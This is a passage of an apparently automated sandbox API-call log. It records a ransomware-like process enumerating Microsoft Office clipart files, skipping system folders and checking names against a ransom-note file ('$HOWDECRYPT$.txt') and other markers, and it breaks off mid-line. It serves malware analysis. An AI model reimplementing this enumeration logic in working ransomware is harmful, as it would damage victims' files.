7 [0097.640] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="$Recycle.bin") returned 1 [0097.640] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.640] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="System Volume Information") returned -1 [0097.640] lstrlenW (lpString="System Volume Information") returned 25 [0097.640] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 67 [0097.640] StrStrIW (lpFirst="FD00799_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.640] lstrcmpW (lpString1="FD00799_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.640] lstrcmpW (lpString1="FD00799_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.640] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 67 [0097.640] GetProcessHeap () returned 0x2c0000 [0097.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19770 [0097.640] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d70) returned 0x2c310e0 [0097.640] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.640] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="Windows") returned -1 [0097.640] lstrlenW (lpString="Windows") returned 7 [0097.640] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="$Recycle.bin") returned 1 [0097.640] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.640] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="System Volume Information") returned -1 [0097.640] lstrlenW (lpString="System Volume Information") returned 25 [0097.640] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 67 [0097.640] StrStrIW (lpFirst="FD00814_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.640] lstrcmpW (lpString1="FD00814_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.640] lstrcmpW (lpString1="FD00814_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.640] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 67 [0097.641] GetProcessHeap () returned 0x2c0000 [0097.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19840 [0097.641] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d78) returned 0x2c310e0 [0097.641] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.641] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="Windows") returned -1 [0097.641] lstrlenW (lpString="Windows") returned 7 [0097.641] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="$Recycle.bin") returned 1 [0097.641] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.641] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="System Volume Information") returned -1 [0097.641] lstrlenW (lpString="System Volume Information") returned 25 [0097.641] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 67 [0097.641] StrStrIW (lpFirst="FD00965_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.641] lstrcmpW (lpString1="FD00965_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.641] lstrcmpW (lpString1="FD00965_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.641] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 67 [0097.641] GetProcessHeap () returned 0x2c0000 [0097.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19910 [0097.641] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d80) returned 0x2c310e0 [0097.641] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.641] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="Windows") returned -1 [0097.641] lstrlenW (lpString="Windows") returned 7 [0097.641] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="$Recycle.bin") returned 1 [0097.641] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.641] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="System Volume Information") returned -1 [0097.642] lstrlenW (lpString="System Volume Information") returned 25 [0097.642] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 67 [0097.642] StrStrIW (lpFirst="FD01074_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.642] lstrcmpW (lpString1="FD01074_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.642] lstrcmpW (lpString1="FD01074_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.642] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 67 [0097.642] GetProcessHeap () returned 0x2c0000 [0097.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c199e0 [0097.642] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d88) returned 0x2c310e0 [0097.642] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.642] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="Windows") returned -1 [0097.642] lstrlenW (lpString="Windows") returned 7 [0097.642] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="$Recycle.bin") returned 1 [0097.642] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.642] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="System Volume Information") returned -1 [0097.642] lstrlenW (lpString="System Volume Information") returned 25 [0097.642] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 67 [0097.642] StrStrIW (lpFirst="FD01084_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.642] lstrcmpW (lpString1="FD01084_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.642] lstrcmpW (lpString1="FD01084_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.642] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 67 [0097.642] GetProcessHeap () returned 0x2c0000 [0097.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19ab0 [0097.642] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d90) returned 0x2c310e0 [0097.643] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.643] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="Windows") returned -1 [0097.643] lstrlenW (lpString="Windows") returned 7 [0097.643] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="$Recycle.bin") returned 1 [0097.643] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.643] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="System Volume Information") returned -1 [0097.643] lstrlenW (lpString="System Volume Information") returned 25 [0097.643] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 67 [0097.643] StrStrIW (lpFirst="FD01176_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.643] lstrcmpW (lpString1="FD01176_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.643] lstrcmpW (lpString1="FD01176_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.643] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 67 [0097.643] GetProcessHeap () returned 0x2c0000 [0097.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19b80 [0097.643] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d98) returned 0x2c310e0 [0097.643] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.643] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="Windows") returned -1 [0097.643] lstrlenW (lpString="Windows") returned 7 [0097.643] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="$Recycle.bin") returned 1 [0097.643] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.643] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="System Volume Information") returned -1 [0097.643] lstrlenW (lpString="System Volume Information") returned 25 [0097.643] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 67 [0097.643] StrStrIW (lpFirst="FD01191_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.644] lstrcmpW (lpString1="FD01191_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.644] lstrcmpW (lpString1="FD01191_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.644] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 67 [0097.644] GetProcessHeap () returned 0x2c0000 [0097.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19c50 [0097.644] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1da0) returned 0x2c310e0 [0097.644] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.644] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="Windows") returned -1 [0097.644] lstrlenW (lpString="Windows") returned 7 [0097.644] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="$Recycle.bin") returned 1 [0097.644] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.644] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="System Volume Information") returned -1 [0097.644] lstrlenW (lpString="System Volume Information") returned 25 [0097.644] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 67 [0097.644] StrStrIW (lpFirst="FD01193_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.644] lstrcmpW (lpString1="FD01193_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.644] lstrcmpW (lpString1="FD01193_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.644] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 67 [0097.644] GetProcessHeap () returned 0x2c0000 [0097.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19d20 [0097.644] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1da8) returned 0x2c310e0 [0097.644] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.644] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="Windows") returned -1 [0097.644] lstrlenW (lpString="Windows") returned 7 [0097.645] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="$Recycle.bin") returned 1 [0097.645] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.645] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="System Volume Information") returned -1 [0097.645] lstrlenW (lpString="System Volume Information") returned 25 [0097.645] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 67 [0097.645] StrStrIW (lpFirst="FD01196_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.645] lstrcmpW (lpString1="FD01196_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.645] lstrcmpW (lpString1="FD01196_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.645] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 67 [0097.645] GetProcessHeap () returned 0x2c0000 [0097.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19df0 [0097.645] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1db0) returned 0x2c310e0 [0097.645] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.645] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="Windows") returned -1 [0097.645] lstrlenW (lpString="Windows") returned 7 [0097.645] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="$Recycle.bin") returned 1 [0097.645] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.645] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="System Volume Information") returned -1 [0097.645] lstrlenW (lpString="System Volume Information") returned 25 [0097.645] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 67 [0097.645] StrStrIW (lpFirst="FD01548_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.645] lstrcmpW (lpString1="FD01548_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.645] lstrcmpW (lpString1="FD01548_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.645] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 67 [0097.645] GetProcessHeap () returned 0x2c0000 [0097.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19ec0 [0097.646] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1db8) returned 0x2c310e0 [0097.646] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.646] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="Windows") returned -1 [0097.646] lstrlenW (lpString="Windows") returned 7 [0097.646] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="$Recycle.bin") returned 1 [0097.646] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.646] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="System Volume Information") returned -1 [0097.646] lstrlenW (lpString="System Volume Information") returned 25 [0097.646] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 67 [0097.646] StrStrIW (lpFirst="FD01657_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.646] lstrcmpW (lpString1="FD01657_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.646] lstrcmpW (lpString1="FD01657_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.646] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 67 [0097.646] GetProcessHeap () returned 0x2c0000 [0097.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19f90 [0097.646] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1dc0) returned 0x2c310e0 [0097.646] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.646] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="Windows") returned -1 [0097.646] lstrlenW (lpString="Windows") returned 7 [0097.646] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="$Recycle.bin") returned 1 [0097.646] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.646] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="System Volume Information") returned -1 [0097.646] lstrlenW (lpString="System Volume Information") returned 25 [0097.647] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 67 [0097.647] StrStrIW (lpFirst="FD01658_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.647] lstrcmpW (lpString1="FD01658_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.647] lstrcmpW (lpString1="FD01658_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.647] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 67 [0097.647] GetProcessHeap () returned 0x2c0000 [0097.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a060 [0097.647] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1dc8) returned 0x2c310e0 [0097.647] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.647] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="Windows") returned -1 [0097.647] lstrlenW (lpString="Windows") returned 7 [0097.647] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="$Recycle.bin") returned 1 [0097.647] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.647] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="System Volume Information") returned -1 [0097.647] lstrlenW (lpString="System Volume Information") returned 25 [0097.647] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 67 [0097.647] StrStrIW (lpFirst="FD01659_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.647] lstrcmpW (lpString1="FD01659_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.647] lstrcmpW (lpString1="FD01659_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.647] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 67 [0097.647] GetProcessHeap () returned 0x2c0000 [0097.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a130 [0097.647] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1dd0) returned 0x2c310e0 [0097.647] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.647] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="Windows") returned -1 [0097.648] lstrlenW (lpString="Windows") returned 7 [0097.648] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="$Recycle.bin") returned 1 [0097.648] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.648] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="System Volume Information") returned -1 [0097.648] lstrlenW (lpString="System Volume Information") returned 25 [0097.648] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 67 [0097.648] StrStrIW (lpFirst="FD01660_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.648] lstrcmpW (lpString1="FD01660_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.648] lstrcmpW (lpString1="FD01660_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.648] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 67 [0097.648] GetProcessHeap () returned 0x2c0000 [0097.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a200 [0097.648] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1dd8) returned 0x2c310e0 [0097.648] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.648] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="Windows") returned -1 [0097.648] lstrlenW (lpString="Windows") returned 7 [0097.648] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="$Recycle.bin") returned 1 [0097.648] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.648] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="System Volume Information") returned -1 [0097.648] lstrlenW (lpString="System Volume Information") returned 25 [0097.648] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 67 [0097.648] StrStrIW (lpFirst="FD02068_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.649] lstrcmpW (lpString1="FD02068_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.649] lstrcmpW (lpString1="FD02068_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.649] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 67 [0097.649] GetProcessHeap () returned 0x2c0000 [0097.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a2d0 [0097.649] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1de0) returned 0x2c310e0 [0097.649] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.649] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="Windows") returned -1 [0097.649] lstrlenW (lpString="Windows") returned 7 [0097.649] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="$Recycle.bin") returned 1 [0097.649] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.649] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="System Volume Information") returned -1 [0097.649] lstrlenW (lpString="System Volume Information") returned 25 [0097.649] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 67 [0097.649] StrStrIW (lpFirst="FD02071_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.649] lstrcmpW (lpString1="FD02071_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.649] lstrcmpW (lpString1="FD02071_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.649] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 67 [0097.649] GetProcessHeap () returned 0x2c0000 [0097.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a3a0 [0097.649] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1de8) returned 0x2c310e0 [0097.649] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.649] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="Windows") returned -1 [0097.650] lstrlenW (lpString="Windows") returned 7 [0097.650] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="$Recycle.bin") returned 1 [0097.650] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.650] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="System Volume Information") returned -1 [0097.650] lstrlenW (lpString="System Volume Information") returned 25 [0097.650] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 67 [0097.650] StrStrIW (lpFirst="FD02075_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.650] lstrcmpW (lpString1="FD02075_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.650] lstrcmpW (lpString1="FD02075_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.650] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 67 [0097.650] GetProcessHeap () returned 0x2c0000 [0097.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a470 [0097.650] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1df0) returned 0x2c310e0 [0097.650] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.650] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="Windows") returned -1 [0097.650] lstrlenW (lpString="Windows") returned 7 [0097.650] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="$Recycle.bin") returned 1 [0097.650] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.650] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="System Volume Information") returned -1 [0097.650] lstrlenW (lpString="System Volume Information") returned 25 [0097.650] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 67 [0097.650] StrStrIW (lpFirst="FD02088_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.650] lstrcmpW (lpString1="FD02088_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.650] lstrcmpW (lpString1="FD02088_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.650] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 67 [0097.650] GetProcessHeap () returned 0x2c0000 [0097.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a540 [0097.650] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1df8) returned 0x2c310e0 [0097.651] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.651] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="Windows") returned -1 [0097.651] lstrlenW (lpString="Windows") returned 7 [0097.651] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="$Recycle.bin") returned 1 [0097.651] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.651] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="System Volume Information") returned -1 [0097.651] lstrlenW (lpString="System Volume Information") returned 25 [0097.651] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 67 [0097.651] StrStrIW (lpFirst="FD02097_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.651] lstrcmpW (lpString1="FD02097_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.651] lstrcmpW (lpString1="FD02097_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.651] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 67 [0097.651] GetProcessHeap () returned 0x2c0000 [0097.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a610 [0097.651] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e00) returned 0x2c310e0 [0097.651] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.651] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="Windows") returned -1 [0097.651] lstrlenW (lpString="Windows") returned 7 [0097.651] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="$Recycle.bin") returned 1 [0097.651] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.651] lstrcmpiW (lpString1="FD02115_.WMF", 